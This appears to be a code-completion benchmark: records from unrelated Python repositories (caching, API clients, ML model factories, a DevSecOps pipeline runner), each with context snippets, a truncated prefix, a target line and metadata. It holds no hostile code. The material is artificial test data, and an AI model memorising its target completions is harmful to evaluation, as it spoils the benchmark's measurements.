False if this is a switch, click the switch itself, and it changed in the same position.
For example: | [ON] | -> click -> | [OFF] |
"""
self.name = name
self.is_choice = is_selector
self.state_list = []
def __str__(self):
return self.name
__repr__ = __str__
def add_state(self, state: str, check_button: Template, click_button: Template = None):
"""
Args:
state: Must match check_button.name
check_button:
click_button:
"""
self.state_list.append({
'state': state,
'check_button': check_button,
'click_button': click_button if click_button is not None else check_button,
})
def get_data(self, state: Template) -> dict:
"""
Args:
state:
Returns:
Dictionary in add_state
Raises:
ScriptError: If state invalid
"""
for row in self.state_list:
if row['state'] == state.name:
return row
| raise ScriptError(f'Switch {self.name} received an invalid state {state}') | 1 | 2023-11-12 09:33:35+00:00 | 2k |
medkit-lib/medkit | tests/unit/training/dummy_context_component/dummy_component.py | [
{
"identifier": "BatchData",
"path": "medkit/training/utils.py",
"snippet": "class BatchData(dict):\n \"\"\"A BatchData pack data allowing both column and row access\"\"\"\n\n def __getitem__(self, index: int) -> Dict[str, Union[List[Any], torch.Tensor]]:\n if isinstance(index, str):\n ... | import os
import torch
from typing import Optional
from medkit.training import BatchData
from .dummy_model import DummyTextCat, DummyTextCatConfig, DummyTokenizer | 746 |
PYTORCH_MODEL_NAME = "pytorch_model.bin"
class MockTrainableComponent:
def __init__(
self,
model_path: Optional[str] = None,
output_label: str = "category",
device="cpu",
):
self.tokenizer = DummyTokenizer()
# load architecture
|
PYTORCH_MODEL_NAME = "pytorch_model.bin"
class MockTrainableComponent:
def __init__(
self,
model_path: Optional[str] = None,
output_label: str = "category",
device="cpu",
):
self.tokenizer = DummyTokenizer()
# load architecture | self.model = DummyTextCat(config=DummyTextCatConfig()) | 2 | 2023-11-13 16:28:56+00:00 | 2k |
donahowe/VE-MLD | src_files/models/utils/factory.py | [
{
"identifier": "add_ml_decoder_head",
"path": "src_files/ml_decoder/ml_decoder.py",
"snippet": "def add_ml_decoder_head(model, num_classes=-1, num_of_groups=-1, decoder_embedding=768, zsl=0):\n if num_classes == -1:\n num_classes = model.num_classes\n num_features = model.num_features\n ... | import logging
import os
import torch
from urllib import request
from ...ml_decoder.ml_decoder import add_ml_decoder_head
from ..tresnet import TResnetM, TResnetL, TResnetXL
from ..vit import VE | 835 |
logger = logging.getLogger(__name__)
def create_model(args,load_head=False):
"""Create a model
"""
model_params = {'args': args, 'num_classes': args.num_classes, 'image_size': args.image_size}
args = model_params['args']
args.model_name = args.model_name.lower()
if args.model_name == 'vit':
model = VE(model_params)
elif args.model_name == 'tresnet_m':
model = TResnetM(model_params)
elif args.model_name == 'tresnet_l':
|
logger = logging.getLogger(__name__)
def create_model(args,load_head=False):
"""Create a model
"""
model_params = {'args': args, 'num_classes': args.num_classes, 'image_size': args.image_size}
args = model_params['args']
args.model_name = args.model_name.lower()
if args.model_name == 'vit':
model = VE(model_params)
elif args.model_name == 'tresnet_m':
model = TResnetM(model_params)
elif args.model_name == 'tresnet_l': | model = TResnetL(model_params) | 2 | 2023-11-13 04:12:26+00:00 | 2k |
WindowsSov8forUs/bestdori_api | bestdori/utils/network.py | [
{
"identifier": "AssetsNotExistError",
"path": "bestdori/exceptions.py",
"snippet": "class AssetsNotExistError(AssetsException):\n '''资源不存在'''\n # 初始化\n def __init__(self, asset_name: str) -> None:\n msg = f'资源 {asset_name} 可能不存在。'\n super().__init__(msg)"
},
{
"identifier... | from json import dumps
from io import BufferedReader
from httpx._models import Cookies
from httpx import Response, Request, Client
from typing import Optional, Literal, cast, Any
from ..exceptions import (
AssetsNotExistError,
RequestException,
REQUEST_EXCEPTION
) | 1,202 | '''`bestdori.utils.network`
向 Bestdori 发送请求相关模块'''
# 向 Bestdori 发送 API 请求类
class Api:
'''向 Bestdori 发送 API 请求类
参数:
api (str): 请求的 API 地址
proxy (Optional[str]): 代理服务器'''
api: str
'''请求的 API 地址'''
proxy: Optional[str]=None
'''代理服务器'''
headers: dict[str, str]
'''请求头'''
# 初始化
def __init__(
self,
api: str,
proxy: Optional[str]=None
) -> None:
'''初始化'''
self.api = api
self.proxy = proxy
self.headers = {'Content-Type': 'application/json;charset=UTF-8'}
return
# 请求发送
def request(
self,
method: Literal['get', 'post'],
*,
cookies: Optional[Cookies]=None,
params: Optional[dict[str, Any]]=None,
data: Optional[dict[str, Any]]=None,
files: Optional[dict[str, tuple[str, BufferedReader]]]=None
) -> Response:
'''请求发送
参数:
method (Literal['get', 'post']): API 调用方法
cookies (Optional[Cookies], optional): Cookies
params (Optional[dict[str, Any]], optional): 调用参数
data (Optional[dict[str, Any]], optional): 调用参数,将以 `json` 字符串形式发送
files (Optional[dict[str, tuple[str, BufferedReader]]], optional): 发送文件参数
返回:
Response: 收到的响应
'''
# 处理接收到的 API
if self.api.startswith('http://') or self.api.startswith('https://'):
self.api = self.api
else:
self.api = 'https://bestdori.com/api/' + self.api
# 构建一个请求体
request = Request(
method,
self.api,
cookies=cookies,
params=params,
data=cast(dict, dumps(data)) if data is not None else data,
files=files,
headers=self.headers if not self.api.endswith('/upload') else None
)
# 构建代理服务器字典
if self.proxy is not None:
proxies = {'http://': self.proxy, 'https://': self.proxy}
else:
proxies = None
# 发送请求并获取响应
with Client(proxies=cast(dict, proxies)) as client:
response = client.send(request)
client.close()
# 处理接收到的响应
response.raise_for_status()
# 判断接收到的响应是否为 json 格式
if 'application/json' not in (content_type := response.headers.get('content-type', None)):
if content_type is not None:
return response
else:
raise Exception('接收到的响应没有 content-type。')
if isinstance((response_data := response.json()), dict):
if (result := response_data.get('result', None)) is not None:
if result is False:
if (code := response_data.get('code', None)) is not None:
if code in REQUEST_EXCEPTION.keys(): # 若错误码已被记录
exception_class = REQUEST_EXCEPTION[code]
if params is not None:
raise exception_class(self.api, **params)
elif data is not None:
raise exception_class(self.api, **data)
else:
raise exception_class(self.api)
else:
| '''`bestdori.utils.network`
向 Bestdori 发送请求相关模块'''
# 向 Bestdori 发送 API 请求类
class Api:
'''向 Bestdori 发送 API 请求类
参数:
api (str): 请求的 API 地址
proxy (Optional[str]): 代理服务器'''
api: str
'''请求的 API 地址'''
proxy: Optional[str]=None
'''代理服务器'''
headers: dict[str, str]
'''请求头'''
# 初始化
def __init__(
self,
api: str,
proxy: Optional[str]=None
) -> None:
'''初始化'''
self.api = api
self.proxy = proxy
self.headers = {'Content-Type': 'application/json;charset=UTF-8'}
return
# 请求发送
def request(
self,
method: Literal['get', 'post'],
*,
cookies: Optional[Cookies]=None,
params: Optional[dict[str, Any]]=None,
data: Optional[dict[str, Any]]=None,
files: Optional[dict[str, tuple[str, BufferedReader]]]=None
) -> Response:
'''请求发送
参数:
method (Literal['get', 'post']): API 调用方法
cookies (Optional[Cookies], optional): Cookies
params (Optional[dict[str, Any]], optional): 调用参数
data (Optional[dict[str, Any]], optional): 调用参数,将以 `json` 字符串形式发送
files (Optional[dict[str, tuple[str, BufferedReader]]], optional): 发送文件参数
返回:
Response: 收到的响应
'''
# 处理接收到的 API
if self.api.startswith('http://') or self.api.startswith('https://'):
self.api = self.api
else:
self.api = 'https://bestdori.com/api/' + self.api
# 构建一个请求体
request = Request(
method,
self.api,
cookies=cookies,
params=params,
data=cast(dict, dumps(data)) if data is not None else data,
files=files,
headers=self.headers if not self.api.endswith('/upload') else None
)
# 构建代理服务器字典
if self.proxy is not None:
proxies = {'http://': self.proxy, 'https://': self.proxy}
else:
proxies = None
# 发送请求并获取响应
with Client(proxies=cast(dict, proxies)) as client:
response = client.send(request)
client.close()
# 处理接收到的响应
response.raise_for_status()
# 判断接收到的响应是否为 json 格式
if 'application/json' not in (content_type := response.headers.get('content-type', None)):
if content_type is not None:
return response
else:
raise Exception('接收到的响应没有 content-type。')
if isinstance((response_data := response.json()), dict):
if (result := response_data.get('result', None)) is not None:
if result is False:
if (code := response_data.get('code', None)) is not None:
if code in REQUEST_EXCEPTION.keys(): # 若错误码已被记录
exception_class = REQUEST_EXCEPTION[code]
if params is not None:
raise exception_class(self.api, **params)
elif data is not None:
raise exception_class(self.api, **data)
else:
raise exception_class(self.api)
else: | raise RequestException(self.api, code) | 1 | 2023-11-16 13:09:20+00:00 | 2k |
jidiai/Competition_OvercookedAI-2 | run_log.py | [
{
"identifier": "make",
"path": "env/chooseenv.py",
"snippet": "def make(env_type, seed=None, conf=None):\n file_path = os.path.join(os.path.dirname(__file__), 'config.json')\n if not conf:\n with open(file_path) as f:\n conf = json.load(f)[env_type]\n class_literal = conf['cl... | import os
import time
import json
import numpy as np
import argparse
import sys
from env.chooseenv import make
from utils.get_logger import get_logger
from env.obs_interfaces.observation import obs_type | 1,348 | # -*- coding:utf-8 -*-
sys.path.append("./olympics_engine")
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def get_players_and_action_space_list(g):
if sum(g.agent_nums) != g.n_player:
raise Exception("agent number = %d 不正确,与n_player = %d 不匹配" % (sum(g.agent_nums), g.n_player))
n_agent_num = list(g.agent_nums)
for i in range(1, len(n_agent_num)):
n_agent_num[i] += n_agent_num[i - 1]
# 根据agent number 分配 player id
players_id = []
actions_space = []
for policy_i in range(len(g.obs_type)):
if policy_i == 0:
players_id_list = range(n_agent_num[policy_i])
else:
players_id_list = range(n_agent_num[policy_i - 1], n_agent_num[policy_i])
players_id.append(players_id_list)
action_space_list = [g.get_single_action_space(player_id) for player_id in players_id_list]
actions_space.append(action_space_list)
return players_id, actions_space
def get_joint_action_eval(game, multi_part_agent_ids, policy_list, actions_spaces, all_observes):
if len(policy_list) != len(game.agent_nums):
error = "模型个数%d与玩家个数%d维度不正确!" % (len(policy_list), len(game.agent_nums))
raise Exception(error)
# [[[0, 0, 0, 1]], [[0, 1, 0, 0]]]
joint_action = []
for policy_i in range(len(policy_list)):
if game.obs_type[policy_i] not in obs_type:
raise Exception("可选obs类型:%s" % str(obs_type))
agents_id_list = multi_part_agent_ids[policy_i]
action_space_list = actions_spaces[policy_i]
function_name = 'm%d' % policy_i
for i in range(len(agents_id_list)):
agent_id = agents_id_list[i]
a_obs = all_observes[agent_id]
each = eval(function_name)(a_obs, action_space_list[i], game.is_act_continuous)
joint_action.append(each)
# print(joint_action)
return joint_action
def set_seed(g, env_name):
if env_name.split("-")[0] in ['magent']:
g.reset()
seed = g.create_seed()
g.set_seed(seed)
def run_game(g, env_name, multi_part_agent_ids, actions_spaces, policy_list, render_mode):
"""
This function is used to generate log for Vue rendering. Saves .json file
"""
log_path = os.getcwd() + '/logs/'
if not os.path.exists(log_path):
os.mkdir(log_path)
| # -*- coding:utf-8 -*-
sys.path.append("./olympics_engine")
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def get_players_and_action_space_list(g):
if sum(g.agent_nums) != g.n_player:
raise Exception("agent number = %d 不正确,与n_player = %d 不匹配" % (sum(g.agent_nums), g.n_player))
n_agent_num = list(g.agent_nums)
for i in range(1, len(n_agent_num)):
n_agent_num[i] += n_agent_num[i - 1]
# 根据agent number 分配 player id
players_id = []
actions_space = []
for policy_i in range(len(g.obs_type)):
if policy_i == 0:
players_id_list = range(n_agent_num[policy_i])
else:
players_id_list = range(n_agent_num[policy_i - 1], n_agent_num[policy_i])
players_id.append(players_id_list)
action_space_list = [g.get_single_action_space(player_id) for player_id in players_id_list]
actions_space.append(action_space_list)
return players_id, actions_space
def get_joint_action_eval(game, multi_part_agent_ids, policy_list, actions_spaces, all_observes):
if len(policy_list) != len(game.agent_nums):
error = "模型个数%d与玩家个数%d维度不正确!" % (len(policy_list), len(game.agent_nums))
raise Exception(error)
# [[[0, 0, 0, 1]], [[0, 1, 0, 0]]]
joint_action = []
for policy_i in range(len(policy_list)):
if game.obs_type[policy_i] not in obs_type:
raise Exception("可选obs类型:%s" % str(obs_type))
agents_id_list = multi_part_agent_ids[policy_i]
action_space_list = actions_spaces[policy_i]
function_name = 'm%d' % policy_i
for i in range(len(agents_id_list)):
agent_id = agents_id_list[i]
a_obs = all_observes[agent_id]
each = eval(function_name)(a_obs, action_space_list[i], game.is_act_continuous)
joint_action.append(each)
# print(joint_action)
return joint_action
def set_seed(g, env_name):
if env_name.split("-")[0] in ['magent']:
g.reset()
seed = g.create_seed()
g.set_seed(seed)
def run_game(g, env_name, multi_part_agent_ids, actions_spaces, policy_list, render_mode):
"""
This function is used to generate log for Vue rendering. Saves .json file
"""
log_path = os.getcwd() + '/logs/'
if not os.path.exists(log_path):
os.mkdir(log_path)
| logger = get_logger(log_path, g.game_name, json_file=render_mode) | 1 | 2023-11-15 09:09:01+00:00 | 2k |
AnonymGiant/ViLaM | lavis/processors/blip_processors.py | [
{
"identifier": "registry",
"path": "lavis/common/registry.py",
"snippet": "class Registry:\n def register_builder(cls, name):\n def wrap(builder_cls):\n def register_task(cls, name):\n def wrap(task_cls):\n def register_model(cls, name):\n def wrap(model_cls):\n def reg... | import re
from lavis.common.registry import registry
from lavis.processors.base_processor import BaseProcessor
from lavis.processors.randaugment import RandomAugment
from omegaconf import OmegaConf
from torchvision import transforms
from torchvision.transforms.functional import InterpolationMode | 832 | """
Copyright (c) 2022, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
class BlipImageBaseProcessor(BaseProcessor):
def __init__(self, mean=None, std=None):
if mean is None:
mean = (0.48145466, 0.4578275, 0.40821073)
if std is None:
std = (0.26862954, 0.26130258, 0.27577711)
self.normalize = transforms.Normalize(mean, std)
| """
Copyright (c) 2022, salesforce.com, inc.
All rights reserved.
SPDX-License-Identifier: BSD-3-Clause
For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
"""
class BlipImageBaseProcessor(BaseProcessor):
def __init__(self, mean=None, std=None):
if mean is None:
mean = (0.48145466, 0.4578275, 0.40821073)
if std is None:
std = (0.26862954, 0.26130258, 0.27577711)
self.normalize = transforms.Normalize(mean, std)
| @registry.register_processor("blip_caption") | 0 | 2023-11-14 08:57:59+00:00 | 2k |
MorrisNein/pecapiku | pecapiku/single_value_cache.py | [
{
"identifier": "BaseCache",
"path": "pecapiku/base_cache.py",
"snippet": "class omnimethod(Generic[DecoratedCallable]):\nclass BaseCache(ABC):\n def __init__(self, func: DecoratedCallable):\n def __get__(self, instance, owner) -> DecoratedCallable:\n def __init__(self, file_path: os.PathLike |... | import os
from functools import partial, wraps
from typing import Any, Generic, Hashable
from pecapiku.base_cache import BaseCache, DecoratedCallable, Decorator, omnimethod
from pecapiku.cache_access import CacheAccess, _initialize_cache, _resolve_filepath, update_cache
from pecapiku.no_cache import NoCache | 912 | from __future__ import annotations
class SingleValueCache(BaseCache, Generic[DecoratedCallable]):
""" Decorator for caching of evaluation results.
Creates a "pickle" file at disk space on a specified path.
Wraps a function and stores its execution result in the file.
To apply, use the method ``SingleValueCache.decorate()`` or ``SingleValueCache(...)()``.
Args:
file_path - a path to an existing or non-existent pickle file.
If a relative path or a filename is given, puts it into the framework cache directory.
access - cache access indicators. The string may include the following indicators:
- ``r`` - read - grants access to read the cache file content
- ``e`` - execute/evaluate - grants access to evaluate the decorated function (if such is present)
- ``w`` - write - grants access to modify the cache file content
Example
-------
>>> import time
>>> from timeit import timeit
>>> def a_heavy_function():
... time.sleep(1)
...
... @SingleValueCache('a_heavy_function.pkl') # or @SingleValueCache.decorate(file_path='a_heavy_function.pkl')
>>> def a_heavy_function_cached():
... time.sleep(1)
>>> print(timeit(a_heavy_function, number=10)) # 10.070
>>> print(timeit(a_heavy_function_cached, number=10)) # 1.015
"""
@classmethod
def _get_default_file_path(cls) -> None:
return None
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
super().__init__(file_path, access)
self.cache_dict = None
def __call__(self,
func: DecoratedCallable | None = None, *, file_path: os.PathLike | str | None = None,
| from __future__ import annotations
class SingleValueCache(BaseCache, Generic[DecoratedCallable]):
""" Decorator for caching of evaluation results.
Creates a "pickle" file at disk space on a specified path.
Wraps a function and stores its execution result in the file.
To apply, use the method ``SingleValueCache.decorate()`` or ``SingleValueCache(...)()``.
Args:
file_path - a path to an existing or non-existent pickle file.
If a relative path or a filename is given, puts it into the framework cache directory.
access - cache access indicators. The string may include the following indicators:
- ``r`` - read - grants access to read the cache file content
- ``e`` - execute/evaluate - grants access to evaluate the decorated function (if such is present)
- ``w`` - write - grants access to modify the cache file content
Example
-------
>>> import time
>>> from timeit import timeit
>>> def a_heavy_function():
... time.sleep(1)
...
... @SingleValueCache('a_heavy_function.pkl') # or @SingleValueCache.decorate(file_path='a_heavy_function.pkl')
>>> def a_heavy_function_cached():
... time.sleep(1)
>>> print(timeit(a_heavy_function, number=10)) # 10.070
>>> print(timeit(a_heavy_function_cached, number=10)) # 1.015
"""
@classmethod
def _get_default_file_path(cls) -> None:
return None
def __init__(self, file_path: os.PathLike | str | None = None, access: CacheAccess = 'rew'):
super().__init__(file_path, access)
self.cache_dict = None
def __call__(self,
func: DecoratedCallable | None = None, *, file_path: os.PathLike | str | None = None, | access: CacheAccess | None = None) -> DecoratedCallable | Decorator: | 0 | 2023-11-17 12:10:01+00:00 | 2k |
gerlaxrex/parrot | parrot1/audio/extraction/audio_extraction.py | [
{
"identifier": "get_extension",
"path": "parrot1/utils/file_utils.py",
"snippet": "def get_extension(filename: Union[str, os.PathLike]) -> str:\n return os.path.basename(filename).rsplit(\".\", 1)[1]"
},
{
"identifier": "split_on_silence",
"path": "parrot1/audio/utils/silence.py",
"s... | import logging
import os
from typing import List, Union
from pydub import AudioSegment
from tqdm import tqdm
from parrot1.utils.file_utils import get_extension
from parrot1.audio.utils.silence import split_on_silence | 653 |
__logger = logging.getLogger(__name__)
def get_audio_from_video(video_filename: Union[str, os.PathLike]) -> AudioSegment:
"""
Takes the audio from the video file
:param video_filename: (Union[str, os.PathLike]) path to the video
:return: (io.BytesIO) Audio bytes
"""
if not os.path.exists(video_filename):
raise FileNotFoundError(f"File at {video_filename} does not exists.")
|
__logger = logging.getLogger(__name__)
def get_audio_from_video(video_filename: Union[str, os.PathLike]) -> AudioSegment:
"""
Takes the audio from the video file
:param video_filename: (Union[str, os.PathLike]) path to the video
:return: (io.BytesIO) Audio bytes
"""
if not os.path.exists(video_filename):
raise FileNotFoundError(f"File at {video_filename} does not exists.") | audio = AudioSegment.from_file(video_filename, format=get_extension(video_filename)) | 0 | 2023-11-14 22:33:32+00:00 | 2k |
chenaoxuan/UsfUtils | usfutils/config.py | [
{
"identifier": "master_only",
"path": "usfutils/dist.py",
"snippet": "def master_only(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n rank, _ = get_dist_info()\n if rank == 0:\n return func(*args, **kwargs)\n\n return wrapper"
},
{
"identifier... | import io
import os
import sys
import yaml
from shutil import copyfile
from typing import Union
from .dist import master_only
from .time import get_time_asc
from .dict import UsfDict | 669 |
__all__ = [
'load_yaml',
'dict_to_yaml',
'copy_opt_file'
]
|
__all__ = [
'load_yaml',
'dict_to_yaml',
'copy_opt_file'
]
| def load_yaml(path: str) -> UsfDict: | 2 | 2023-11-16 04:39:34+00:00 | 2k |
ErdemOzgen/DevSecOpsBuilder | main.py | [
{
"identifier": "pipeline_executer",
"path": "devsecopsbuilder/pipeline_executer.py",
"snippet": "def load_configuration(filepath):\ndef create_output_directory(directory):\ndef install_tools(tools):\ndef update_tools(tools):\ndef run_command(step, output_dir, **kwargs):\ndef execute_post_command(step, ... | import argparse
import networkx as nx
import matplotlib.pyplot as plt
from devsecopsbuilder import pipeline_executer
from devsecopsbuilder import convert_graph
from devsecopsbuilder import convert_pipeline
from devsecopsbuilder import generate_report # noqa: F401
from devsecopsbuilder import asciiart | 1,292 |
def main():
parser = argparse.ArgumentParser(description="Pipeline Execution Script")
parser.add_argument("--install", action="store_true", help="Install tools")
parser.add_argument("--update", action="store_true", help="Update tools")
parser.add_argument(
"--execute", action="store_true", help="Execute commands from playbook"
)
parser.add_argument(
"--config",
default="./playbooks/playbook.yaml",
help="Path to configuration file (optional)",
)
parser.add_argument(
"--output_dir",
default="command_outputs/outputs",
help="Path to output directory (optional)",
)
parser.add_argument(
"--tools_config",
default="./tools/tools.yaml",
help="Path to tools configuration file (optional)",
)
parser.add_argument(
"--report",
action="store_true",
help="Generates a report of the results of playbooks",
)
parser.add_argument(
"--generate_graph",
action="store_true",
help="Generate graph of defined yaml workflow",
)
parser.add_argument(
"--graph_yaml",
default="./playbooks/playbook.yaml",
help="Path to yaml file for generating graph (optional)",
)
parser.add_argument(
"--graph_output_dir",
default="command_outputs/graphs/graph.png",
help="Path to graph output directory (optional)",
)
parser.add_argument(
"--convert_pipeline", action="store_true", help="Convert yaml to pipeline" # noqa: E501
)
parser.add_argument(
"--pipeline_yaml",
default="./playbooks/playbook.yaml",
help="Path to workflow yaml file to pipeline (optional)",
)
parser.add_argument(
"--pipeline_output_dir",
default="command_outputs/jenkinsFiles/Jenkinsfile",
help="Path to pipeline output directory (optional)",
)
args = parser.parse_args()
# Check if no actionable arguments were provided
actionable_args = [
args.install,
args.update,
args.execute,
args.report,
args.generate_graph,
args.convert_pipeline,
]
if not any(actionable_args):
asciiart.print_ascii_art()
parser.print_help()
return
# Load configuration from specified or default path
config = pipeline_executer.load_configuration(args.config)
# Create specified or default output directory
pipeline_executer.create_output_directory(args.output_dir)
# Define default paths and other variables as a dictionary
default_variables = {
# Default variable values go here
}
if args.install or args.update:
# Load tool configuration from the YAML file
tools_config = pipeline_executer.load_configuration(args.tools_config)
all_tools = tools_config["tools_to_install"]["tools"]
default_tools = [tool for tool in all_tools if tool.get("default", False)] # noqa: E501
# Assuming 'tools' is the relevant section in the configuration for install/update # noqa: E501
# tools = config.get("tools", [])
if args.install:
# Install tools
pipeline_executer.install_tools(default_tools)
elif args.update:
# Update tools
pipeline_executer.update_tools(default_tools)
if args.execute:
# Execute configured commands
commands_to_run = config.get("commands_to_run", {}).get("steps", [])
for step in commands_to_run:
if isinstance(step, dict):
# Update default variables with step-specific ones if they exist # noqa: E501
step_variables = {**default_variables, **step.get("parameters", {})} # noqa: E501
pipeline_executer.run_command(step, args.output_dir, **step_variables) # noqa: E501
else:
print(f"Invalid step format: {step}")
if args.generate_graph:
try:
|
def main():
parser = argparse.ArgumentParser(description="Pipeline Execution Script")
parser.add_argument("--install", action="store_true", help="Install tools")
parser.add_argument("--update", action="store_true", help="Update tools")
parser.add_argument(
"--execute", action="store_true", help="Execute commands from playbook"
)
parser.add_argument(
"--config",
default="./playbooks/playbook.yaml",
help="Path to configuration file (optional)",
)
parser.add_argument(
"--output_dir",
default="command_outputs/outputs",
help="Path to output directory (optional)",
)
parser.add_argument(
"--tools_config",
default="./tools/tools.yaml",
help="Path to tools configuration file (optional)",
)
parser.add_argument(
"--report",
action="store_true",
help="Generates a report of the results of playbooks",
)
parser.add_argument(
"--generate_graph",
action="store_true",
help="Generate graph of defined yaml workflow",
)
parser.add_argument(
"--graph_yaml",
default="./playbooks/playbook.yaml",
help="Path to yaml file for generating graph (optional)",
)
parser.add_argument(
"--graph_output_dir",
default="command_outputs/graphs/graph.png",
help="Path to graph output directory (optional)",
)
parser.add_argument(
"--convert_pipeline", action="store_true", help="Convert yaml to pipeline" # noqa: E501
)
parser.add_argument(
"--pipeline_yaml",
default="./playbooks/playbook.yaml",
help="Path to workflow yaml file to pipeline (optional)",
)
parser.add_argument(
"--pipeline_output_dir",
default="command_outputs/jenkinsFiles/Jenkinsfile",
help="Path to pipeline output directory (optional)",
)
args = parser.parse_args()
# Check if no actionable arguments were provided
actionable_args = [
args.install,
args.update,
args.execute,
args.report,
args.generate_graph,
args.convert_pipeline,
]
if not any(actionable_args):
asciiart.print_ascii_art()
parser.print_help()
return
# Load configuration from specified or default path
config = pipeline_executer.load_configuration(args.config)
# Create specified or default output directory
pipeline_executer.create_output_directory(args.output_dir)
# Define default paths and other variables as a dictionary
default_variables = {
# Default variable values go here
}
if args.install or args.update:
# Load tool configuration from the YAML file
tools_config = pipeline_executer.load_configuration(args.tools_config)
all_tools = tools_config["tools_to_install"]["tools"]
default_tools = [tool for tool in all_tools if tool.get("default", False)] # noqa: E501
# Assuming 'tools' is the relevant section in the configuration for install/update # noqa: E501
# tools = config.get("tools", [])
if args.install:
# Install tools
pipeline_executer.install_tools(default_tools)
elif args.update:
# Update tools
pipeline_executer.update_tools(default_tools)
if args.execute:
# Execute configured commands
commands_to_run = config.get("commands_to_run", {}).get("steps", [])
for step in commands_to_run:
if isinstance(step, dict):
# Update default variables with step-specific ones if they exist # noqa: E501
step_variables = {**default_variables, **step.get("parameters", {})} # noqa: E501
pipeline_executer.run_command(step, args.output_dir, **step_variables) # noqa: E501
else:
print(f"Invalid step format: {step}")
if args.generate_graph:
try: | workflow_graph = convert_graph.parse_yaml_and_create_graph(args.graph_yaml) # noqa: E501 | 1 | 2023-11-14 07:50:52+00:00 | 2k |
doodledood/chat-flock | chatflock/participants/user.py | [
{
"identifier": "ActiveChatParticipant",
"path": "chatflock/base.py",
"snippet": "class ActiveChatParticipant(ChatParticipant):\n symbol: str\n messages_hidden: bool = False\n\n def __init__(self, name: str, symbol: str = \"👤\", messages_hidden: bool = False):\n super().__init__(name=na... | from typing import Any
from chatflock.base import ActiveChatParticipant, Chat | 1,260 |
class UserChatParticipant(ActiveChatParticipant):
def __init__(self, name: str = "User", role: str = "User", symbol: str = "👤", **kwargs: Any):
super().__init__(name, messages_hidden=True, **kwargs)
self.role = role
self.symbol = symbol
|
class UserChatParticipant(ActiveChatParticipant):
def __init__(self, name: str = "User", role: str = "User", symbol: str = "👤", **kwargs: Any):
super().__init__(name, messages_hidden=True, **kwargs)
self.role = role
self.symbol = symbol
| def respond_to_chat(self, chat: Chat) -> str: | 1 | 2023-11-12 11:10:58+00:00 | 2k |
phidatahq/junior-de | app/pages/3_DuckGPT_S3.py | [
{
"identifier": "get_openai_key",
"path": "app/openai_key.py",
"snippet": "def get_openai_key() -> Optional[str]:\n \"\"\"Sidebar component to get OpenAI API key\"\"\"\n\n # Get OpenAI API key from environment variable\n openai_key: Optional[str] = getenv(\"OPENAI_API_KEY\")\n # If not found... | from typing import List
from phi.conversation import Conversation
from app.openai_key import get_openai_key
from app.password import check_password
from app.reload import reload_button
from app.user_name import get_user_name
from duckgpt.s3_tables import load_s3_tables
from llm.conversations.duckgpt_s3 import duckdb_s3_tools, get_duckgpt_s3_conversation
from utils.log import logger
import streamlit as st | 1,278 |
st.title(":snowman: DuckGPT")
st.markdown('<a href="https://github.com/phidatahq/phidata"><h4>by phidata</h4></a>', unsafe_allow_html=True)
def restart_conversation():
st.session_state["s3_conversation"] = None
st.session_state["s3_conversation_id"] = None
st.rerun()
def main() -> None:
# Get users OpenAI API key
get_openai_key()
# Get user name
|
st.title(":snowman: DuckGPT")
st.markdown('<a href="https://github.com/phidatahq/phidata"><h4>by phidata</h4></a>', unsafe_allow_html=True)
def restart_conversation():
st.session_state["s3_conversation"] = None
st.session_state["s3_conversation_id"] = None
st.rerun()
def main() -> None:
# Get users OpenAI API key
get_openai_key()
# Get user name | user_name = get_user_name() | 3 | 2023-11-14 10:44:20+00:00 | 2k |
YoungJooHan/NM-FlowGAN | util/file_manager.py | [
{
"identifier": "tensor2np",
"path": "util/util.py",
"snippet": "def tensor2np(t:torch.Tensor):\n '''\n transform torch Tensor to numpy having opencv image form.\n RGB -> BGR\n (c,h,w) -> (h,w,c)\n '''\n t = t.cpu().detach()\n\n # gray\n if len(t.shape) == 2:\n return t.pe... | import os
import cv2
import numpy as np
import torch
from .util import tensor2np, save_img | 789 |
class FileManager:
def __init__(self, session_name, output_path=None):
if output_path is None:
self.output_folder = "./output"
else:
self.output_folder = output_path
if not os.path.isdir(self.output_folder):
os.makedirs(self.output_folder)
print("[WARNING] output folder is not exist, create new one")
# init session
self.session_name = session_name
os.makedirs(os.path.join(self.output_folder, self.session_name), exist_ok=True)
# mkdir
for directory in ['checkpoint', 'img']:
self.make_dir(directory)
def is_dir_exist(self, dir_name:str) -> bool:
return os.path.isdir(os.path.join(self.output_folder, self.session_name, dir_name))
def make_dir(self, dir_name:str) -> str:
os.makedirs(os.path.join(self.output_folder, self.session_name, dir_name), exist_ok=True)
def get_dir(self, dir_name:str) -> str:
# -> './output/<session_name>/dir_name'
return os.path.join(self.output_folder, self.session_name, dir_name)
def save_img_tensor(self, dir_name:str, file_name:str, img:torch.Tensor, ext='png'):
self.save_img_numpy(dir_name, file_name, tensor2np(img), ext)
def save_img_numpy(self, dir_name:str, file_name:str, img:np.array, ext='png'):
if np.shape(img)[2] == 1:
|
class FileManager:
def __init__(self, session_name, output_path=None):
if output_path is None:
self.output_folder = "./output"
else:
self.output_folder = output_path
if not os.path.isdir(self.output_folder):
os.makedirs(self.output_folder)
print("[WARNING] output folder is not exist, create new one")
# init session
self.session_name = session_name
os.makedirs(os.path.join(self.output_folder, self.session_name), exist_ok=True)
# mkdir
for directory in ['checkpoint', 'img']:
self.make_dir(directory)
def is_dir_exist(self, dir_name:str) -> bool:
return os.path.isdir(os.path.join(self.output_folder, self.session_name, dir_name))
def make_dir(self, dir_name:str) -> str:
os.makedirs(os.path.join(self.output_folder, self.session_name, dir_name), exist_ok=True)
def get_dir(self, dir_name:str) -> str:
# -> './output/<session_name>/dir_name'
return os.path.join(self.output_folder, self.session_name, dir_name)
def save_img_tensor(self, dir_name:str, file_name:str, img:torch.Tensor, ext='png'):
self.save_img_numpy(dir_name, file_name, tensor2np(img), ext)
